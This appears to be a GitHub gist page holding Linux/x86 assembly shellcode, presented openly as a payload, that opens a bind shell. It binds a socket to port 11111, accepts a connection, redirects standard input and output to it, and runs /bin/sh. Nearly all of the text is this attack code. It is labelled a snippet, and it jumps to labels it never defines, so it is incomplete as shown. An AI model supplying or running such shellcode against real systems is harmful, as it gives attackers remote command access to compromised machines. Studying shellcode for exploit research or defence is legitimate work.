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Last active May 26, 2018 23:00
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Save geyslan/5176409 to your computer and use it in GitHub Desktop.
Shell Bind TCP Shellcode in Assembly (Linux/x86) - forlife
; This is a snippet of the original file in
global _start
section .text
; Setting port number
mov bp, 0x672b ; port in byte reverse order = 11111
; Creating the socket file descriptor
; socket(2, 1, 0)
push 102
pop eax
push 1
pop ebx
; socket arguments
push edx
push ebx
push 2
mov ecx, esp
int 0x80
mov esi, eax ; esi now contains the socket file descriptor
pop edi ; pop 2 to edi
; Avoiding SIGSEGV when trying to reconnect before the kernel to close the socket previously opened
; This problem happens in most shellcodes, even in the Metasploit, because they do not care
; about the reuse of the socket address
; setsockopt(sockfd, 1, 2, &socklen_t, 4)
mov al, 102
; setsockopt arguments
push 4
push esp
push edi
push ebx
push esi
mov ecx, esp
mov bl, 14
int 0x80
; Biding the socket with an address type
; bind(sockfd, [2, port, 0], 16)
mov al, 102
mov ebx, edi
; sockaddr_in struct
push edx
push bp ; port number
push bx
mov ecx, esp
; bind arguments
push 16
push ecx
push esi
mov ecx, esp
int 0x80
; Preparing to listen the incoming connection (passive socket)
; listen(sockfd, 0)
mov al, 102
mov bl, 4
push edx
push esi
mov ecx, esp
int 0x80
; Accepting the incoming connection
; accept(sockfd, 0, 0)
mov al, 102
inc ebx
mov [esp+8], edx
int 0x80
xchg eax, ebx
; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
;dup2 (clientfd, fd)
mov ecx, edi
mov al, 63
int 0x80
dec ecx
jns dup_loop ; looping (2, 1, 0)
; Finally, using execve to substitute the actual process with /bin/sh
; execve("/bin/sh", ["/bin/sh", 0], 0)
mov al, 11
push edx
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin"
mov ebx, esp
push edx
push ebx
jmp finalint
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